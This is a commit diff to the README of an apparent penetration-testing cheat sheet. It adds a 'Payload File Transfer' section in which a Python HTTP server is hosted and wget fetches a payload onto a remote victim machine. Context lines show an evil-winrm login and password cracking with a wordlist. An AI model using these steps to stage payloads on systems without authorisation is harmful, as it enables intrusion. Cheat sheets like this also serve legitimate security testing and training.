Update README.md
This commit is contained in:
61
README.md
61
README.md
@@ -269,19 +269,6 @@ evil-winrm -i {IP ADDRESS} -u {USERNAME} -p {PASSWORD}
|
||||
|
||||
<br />
|
||||
|
||||
|
||||
# Reverse Shell
|
||||
|
||||
## Linux
|
||||
|
||||
## Windows
|
||||
|
||||
# Privilege Escalation
|
||||
|
||||
## Linux
|
||||
|
||||
## Windows
|
||||
|
||||
# Password Cracking
|
||||
|
||||
***
|
||||
@@ -309,3 +296,51 @@ john -w=/usr/share/wordlists/rockyou.txt {file.txt}
|
||||
|
||||
<br />
|
||||
|
||||
# Payload File Transfer
|
||||
|
||||
...
|
||||
|
||||
## 1) Python Server
|
||||
|
||||
<br />
|
||||
|
||||
**USAGE**
|
||||
|
||||
<br />
|
||||
|
||||
```bash
|
||||
# Host a personal server on a specific port
|
||||
sudo python3 -m http.server {PORT}
|
||||
```
|
||||
## 2) WGET
|
||||
|
||||
<br />
|
||||
|
||||
**USAGE**
|
||||
|
||||
<br />
|
||||
|
||||
```bash
|
||||
# Download files on the remote machine
|
||||
wget http://{IP ADDRESS}/{FILE} -outfile {FILE}
|
||||
|
||||
# {IP ADDRESS}: Python Server IP Address
|
||||
# {FILE}: The payload to be trasnfered
|
||||
```
|
||||
<br />
|
||||
|
||||
# Privilege Escalation
|
||||
|
||||
## Linux
|
||||
|
||||
## Windows
|
||||
|
||||
|
||||
# Reverse Shell
|
||||
|
||||
## Linux
|
||||
|
||||
## Windows
|
||||
|
||||
|
||||
|
||||
|
||||
Reference in New Issue
Block a user